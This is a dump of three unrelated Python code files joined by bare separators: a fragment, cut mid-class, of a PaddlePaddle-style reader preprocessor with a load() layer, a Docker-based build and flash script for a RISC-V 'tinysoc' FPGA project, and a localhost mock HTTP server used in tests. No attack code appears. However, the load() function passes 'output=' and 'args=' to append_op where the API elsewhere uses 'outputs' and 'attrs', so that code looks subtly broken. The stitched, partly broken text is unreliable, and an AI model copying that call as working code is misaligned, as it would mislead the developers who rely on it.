BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
build.py
|
#!/usr/bin/env python
import os
import sys
from queue import Queue, Empty
from threading import Thread
from subprocess import PIPE, Popen
BUILD_IMAGE = 'build/nevercast_tinysoc_tinysoc_0.1/tinyfpga_bx-icestorm/nevercast_tinysoc_tinysoc_0.1.bin'
RISCV_TOOLCHAIN_PATH = '/opt/riscv32i/bin/'
FIRMWARE_OUTPUT_PATH = 'build/firmware/'
FIRMWARE_IMAGE_NAME = 'firmware'
FIRMWARE_LINKER_SCRIPT = 'firmware/sections.lds'
FIRMWARE_SOURCE = [
'firmware/start.S',
'firmware/entry.c'
]
current_prefix = None
announced_mountpath = False
def _log_stdout(output_line):
sys.stdout.write(current_prefix + output_line)
def _log_stderr(output_line):
sys.stderr.write(current_prefix + output_line)
def _set_subtask(subtask_name, subtask_index=None, subtask_total=None):
global current_prefix
if subtask_index is None or subtask_total is None:
subtask_text = subtask_name
else:
subtask_text = '[{}/{}] {}'.format(subtask_index, subtask_total, subtask_name)
root_task = current_prefix.split(':', 1)[0]
current_prefix = '{}: {}: '.format(root_task, subtask_text)
def _thread_queue_output(out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
def _process_create_output_queues(process):
out_q, err_q = Queue(), Queue()
for thread_args in zip((process.stdout, process.stderr), (out_q, err_q)):
t = Thread(target=_thread_queue_output, args=thread_args)
t.daemon = True
t.start()
return out_q, err_q
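# Note (added): the reader threads above drain stdout and stderr concurrently
# into queues; reading the pipes sequentially on the main thread could deadlock
# if the child fills one pipe while we block on the other.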
def _drain_output_queue(queue, line_handler):
while True: # breaks on empty
try:
line_handler(queue.get_nowait())
except Empty:
return
def _invoke(*popen_args, interactive=False, **popen_kwargs):
if interactive: # we perform a passthrough
process = Popen(*popen_args, stdout=sys.stdout, stderr=sys.stderr, stdin=sys.stdin, text=True, bufsize=1, **popen_kwargs)
process.wait()
else: # otherwise, intercept the output and prefix it
process = Popen(*popen_args, stdout=PIPE, stderr=PIPE, text=True, bufsize=1, **popen_kwargs)
q_stdout, q_stderr = _process_create_output_queues(process)
while process.poll() is None:
_drain_output_queue(q_stdout, _log_stdout)
_drain_output_queue(q_stderr, _log_stderr)
_drain_output_queue(q_stdout, _log_stdout)
_drain_output_queue(q_stderr, _log_stderr)
return process
def _invoke_container(container_name, container_command=None, **invoke_kwargs):
global announced_mountpath
absolute_path = os.path.abspath(os.getcwd())
if not announced_mountpath:
_log_stdout('Mounting {} to /workspace in container.\n'.format(absolute_path))
announced_mountpath = True
if container_command is not None:
if isinstance(container_command, (list, tuple)):
extra_args = list(container_command)
else:
command_str = str(container_command)
if ' ' in command_str:
extra_args = command_str.split(' ')
else:
extra_args = [command_str]
return _invoke(['docker', 'run', '--rm', '-it', '-v', '{}:/workspace'.format(absolute_path), container_name] + extra_args, **invoke_kwargs)
else:
return _invoke(['docker', 'run', '--rm', '-it', '-v', '{}:/workspace'.format(absolute_path), container_name], **invoke_kwargs)
def check_process(process, okay_exitcodes=(0,)):
if process.returncode is None:
        return  # maybe this is actually a code error?
if process.returncode not in okay_exitcodes:
_log_stderr('Process failed to exit cleanly, errno: {}\n'.format(process.returncode))
sys.exit(process.returncode)
else: # Don't log anything, it's noisy
pass
def cmd_interactive(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, interactive=True))
def cmd_build(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, 'fusesoc run --target=tinyfpga_bx nevercast:tinysoc:tinysoc'))
def cmd_program(**parameters):
check_process(_invoke(['tinyprog', '-p', BUILD_IMAGE, '-u', FIRMWARE_OUTPUT_PATH + FIRMWARE_IMAGE_NAME + '.bin']))
def cmd_test(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, 'fusesoc run --target=sim nevercast:tinysoc:tinysoc'))
def cmd_compile(**parameters):
container_name = parameters['container_name']
_set_subtask('init', 1, 3)
check_process(
_invoke(['mkdir', '-p', FIRMWARE_OUTPUT_PATH])
)
_set_subtask('gcc', 2, 3)
check_process(
_invoke_container(container_name,
'{riscv_toolchain}riscv32-unknown-elf-gcc -v -march=rv32imc -nostartfiles -Wl,-Bstatic,-T,{sections},--strip-debug,-Map={output_path}{image_name}.map,--cref -ffreestanding -nostdlib -o {output_path}{image_name}.elf {sources}'.format(
riscv_toolchain=RISCV_TOOLCHAIN_PATH,
output_path=FIRMWARE_OUTPUT_PATH,
sections=FIRMWARE_LINKER_SCRIPT,
image_name=FIRMWARE_IMAGE_NAME,
sources=' '.join(FIRMWARE_SOURCE)
)
)
)
_set_subtask('objcopy', 3, 3)
check_process(
_invoke_container(container_name,
'{riscv_toolchain}riscv32-unknown-elf-objcopy -v -O binary {output_path}{image_name}.elf {output_path}{image_name}.bin'.format(
riscv_toolchain=RISCV_TOOLCHAIN_PATH,
output_path=FIRMWARE_OUTPUT_PATH,
image_name=FIRMWARE_IMAGE_NAME
)
)
)
def help(executable):
print('! tinysoc build script !')
print('parameters:')
print(' container_name :: The name of the Docker container to use, default: nevercast/tinysoc:latest')
print(' clk_freq_hz :: Clock frequency to use for simulation and hardware builds, default: 16MHz')
print('commands:')
print(' interactive :: Start an interactive container and open shell')
print(' compile :: Compile tinysoc firmware into a flashable image')
print(' build :: Build a tinysoc hardware image for the TinyFPGA')
print(' program :: Program the last built image to the TinyFPGA')
print(' test :: Simulate the test bench')
print('usage:')
print('{} [parameter=value]... COMMAND [COMMANDS]...'.format(executable))
print('example: Build, Test and Program the TinyFPGA with tinysoc, using default parameters')
print('{} build test program'.format(executable))
print('! end of help !')
def main():
global current_prefix
executable, *arguments = sys.argv
if len(arguments) == 0:
help(executable)
return
parameters = {
'container_name': 'nevercast/tinysoc:latest',
'clk_freq_hz': 16_000_000
}
parameter_types = {
'container_name': str,
'clk_freq_hz': int
}
command_chain = []
valid_commands = [
'interactive', 'build', 'program', 'test', 'compile'
]
for argument in arguments:
if '=' in argument:
key, value = argument.split('=', 1)
if key not in parameters:
help(executable)
print('Parameter {} is not defined. Aborting.'.format(key))
return
# TODO(josh): Experiment or implement in the future, not sure if I'll want this
if key == 'clk_freq_hz':
print('clk_freq_hz parameter is not implemented, sorry! Aborting.')
return
# /TODO
parameters[key] = parameter_types[key](value)
elif argument in valid_commands:
if argument in command_chain:
help(executable)
print('Command {} was already specified earlier in the chain. Aborting.'.format(argument))
return
else:
command_chain.append(argument)
else:
help(executable)
print('Argument {} was not understood. Aborting.'.format(argument))
return
if not command_chain:
help(executable)
print('No commands were specified. Aborting.')
return
for index, command in enumerate(command_chain):
current_prefix = '[{}/{}] {}: '.format(index + 1, len(command_chain), command)
_log_stdout('Begin {}\n'.format(command))
globals()['cmd_{}'.format(command)](**parameters)
if __name__ == '__main__':
main()
|
mock_remote_server.py
|
"""
An HTTP server that listens on localhost and returns a variety of responses for
mocking remote servers.
"""
from contextlib import contextmanager
from threading import Thread
from time import sleep
from wsgiref.simple_server import make_server
import urllib2
import socket
import os
class MockHTTPServer(object):
"""
Mock HTTP server that can take the place of a remote server for testing
fetching of remote resources.
Uses contextmanager to allow easy setup and teardown of the WSGI server in
a separate thread, eg::
    >>> with MockEchoTestServer().serve() as server_address:
... urllib2.urlopen(server_address)
...
Subclass this and override __call__ to provide your own WSGI handler function.
"""
def __call__(self, environ, start_response):
raise NotImplementedError()
@contextmanager
def serve(self, host='localhost', port_range=(8000, 9000)):
"""
Start an instance of wsgiref.simple_server set up to handle requests in
a separate daemon thread.
        Return the address of the server, eg 'http://localhost:8000'.
This uses context manager to make sure the server is stopped::
        >>> with MockEchoTestServer().serve() as addr:
        ...     print urllib2.urlopen('%s/?content=hello+world' % addr).read()
        ...
        hello world
"""
for port in range(*port_range):
try:
server = make_server(host, port, self)
except socket.error:
continue
break
else:
raise Exception("Could not bind to a port in range %r" % (port_range,))
serving = True
def _serve_until_stopped():
while serving:
server.handle_request()
thread = Thread(target=_serve_until_stopped)
thread.daemon = True
thread.start()
try:
yield 'http://%s:%d' % (host, port)
finally:
serving = False
# Call the server to make sure the waiting handle_request()
# call completes. Set a very small timeout as we don't actually need to
# wait for a response. We don't care about exceptions here either.
try:
urllib2.urlopen("http://%s:%s/" % (host, port), timeout=0.01)
except Exception:
pass
@classmethod
def get_content(cls, varspec):
"""
Return the value of the variable at varspec, which must be in the
format 'package.module:variable'. If variable is callable, it will be
called and its return value used.
"""
modpath, var = varspec.split(':')
mod = reduce(getattr, modpath.split('.')[1:], __import__(modpath))
var = reduce(getattr, var.split('.'), mod)
try:
return var()
except TypeError:
return var
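# Illustrative note (not part of the original module): get_content resolves a
# 'package.module:variable' spec by importing the module and walking attribute
# names, so a hypothetical spec such as 'os.path:__doc__' would return the
# os.path module docstring. Shown only as an example of the expected format.
#
#     >>> MockHTTPServer.get_content('os.path:__doc__')  # doctest: +SKIP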
class MockEchoTestServer(MockHTTPServer):
"""
    WSGI application that echoes back the status, headers and
content passed via the URL, eg:
a 500 error response: 'http://localhost/?status=500'
a 200 OK response, returning the function's docstring:
    'http://localhost/?status=200;content-type=text/plain;
    content_var=ckan.tests.lib.test_package_search:test_wsgi_app.__doc__'
To specify content, use:
content=string
content_var=package.module:variable
"""
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
# if 'redirect' in redirect.str_params:
# params = dict([(key, value) for param in request.str_params \
# if key != 'redirect'])
# redirect_status = int(request.str_params['redirect'])
# status = int(request.str_params.get('status', '200'))
# resp = make_response(render_template('error.html'), redirect_status)
# resp.headers['Location'] = url_for(request.path, params)
# return resp
if 'content_var' in request.str_params:
content = request.str_params.get('content_var')
content = self.get_content(content)
elif 'content_long' in request.str_params:
content = '*' * 1000001
else:
content = request.str_params.get('content', '')
if 'method' in request.str_params \
and request.method.lower() != request.str_params['method'].lower():
content = ''
status = 405
if isinstance(content, unicode):
raise TypeError("Expected raw byte string for content")
headers = [
item
for item in request.str_params.items()
if item[0] not in ('content', 'status')
]
if 'length' in request.str_params:
cl = request.str_params.get('length')
headers += [('Content-Length', cl)]
elif content and 'no-content-length' not in request.str_params:
headers += [('Content-Length', str(len(content)))]
start_response(
'%d %s' % (status, responses[status]),
headers
)
return [content]
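# Usage sketch (assumed, not part of the original file): the echo server's response
# is driven entirely by the query string, e.g. forcing a 500 error:
#
#     >>> with MockEchoTestServer().serve() as addr:
#     ...     try:
#     ...         urllib2.urlopen(addr + '/?status=500&content=oops')
#     ...     except urllib2.HTTPError, e:
#     ...         print e.code
#     500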
class MockTimeoutTestServer(MockHTTPServer):
"""
    Sleeps ``timeout`` seconds before responding. Make sure the client timeout you
    are testing with is shorter than this value so the timeout path is exercised.
"""
def __init__(self, timeout):
super(MockTimeoutTestServer, self).__init__()
self.timeout = timeout
def __call__(self, environ, start_response):
# Sleep until self.timeout or the parent thread finishes
sleep(self.timeout)
start_response('200 OK', [('Content-Type', 'text/plain')])
return ['xyz']
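# Usage sketch (assumed, not part of the original file): a client timeout shorter
# than the server's sleep should surface as a timeout error:
#
#     >>> with MockTimeoutTestServer(timeout=5).serve() as addr:
#     ...     try:
#     ...         urllib2.urlopen(addr, timeout=0.1)
#     ...     except Exception:
#     ...         print 'request timed out'
#     request timed out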
def get_file_content(data_filename):
filepath = os.path.join(os.path.dirname(__file__), 'data', data_filename)
assert os.path.exists(filepath), filepath
with open(filepath, 'rb') as f:
return f.read()
class MockWmsServer(MockHTTPServer):
"""Acts like an OGC WMS server (well, one basic call)
"""
def __init__(self, wms_version='1.3'):
self.wms_version = wms_version
super(MockWmsServer, self).__init__()
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WMS&request=GetCapabilities&version=1.1.1
if request.str_params.get('service') != 'WMS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
elif 'version' in request.str_params and \
request.str_params.get('version') != self.wms_version:
status = 405
content = '"version" not compatible - need to be %s' % self.wms_version
elif self.wms_version == '1.1.1':
status = 200
content = get_file_content('wms_getcap_1.1.1.xml')
elif self.wms_version == '1.3':
status = 200
content = get_file_content('wms_getcap_1.3.xml')
start_response(
'%d %s' % (status, responses[status]),
headers.items()
)
return [content]
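# Usage sketch (assumed, not part of the original file): a valid GetCapabilities
# request against the WMS mock returns the canned capabilities XML from the data
# directory, while a mismatched 'service' parameter returns ERROR_WRONG_SERVICE.
#
#     >>> with MockWmsServer(wms_version='1.1.1').serve() as addr:
#     ...     urllib2.urlopen(addr + '/?service=WMS&request=GetCapabilities&version=1.1.1').read()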
class MockWfsServer(MockHTTPServer):
"""Acts like an OGC WFS server (well, one basic call)
"""
def __init__(self):
super(MockWfsServer, self).__init__()
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WFS&request=GetCapabilities
if request.str_params.get('service') != 'WFS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
else:
status = 200
content = get_file_content('wfs_getcap.xml')
start_response(
'%d %s' % (status, responses[status]),
headers.items()
)
return [content]
ERROR_WRONG_SERVICE = "<ows:ExceptionReport version='1.1.0' language='en'" \
" xmlns:ows='http://www.opengis.net/ows'><ows:Exception exceptionCode='NoApplicableCode'>" \
"<ows:ExceptionText>Wrong service type.</ows:ExceptionText></ows:Exception></ows:ExceptionReport>"
|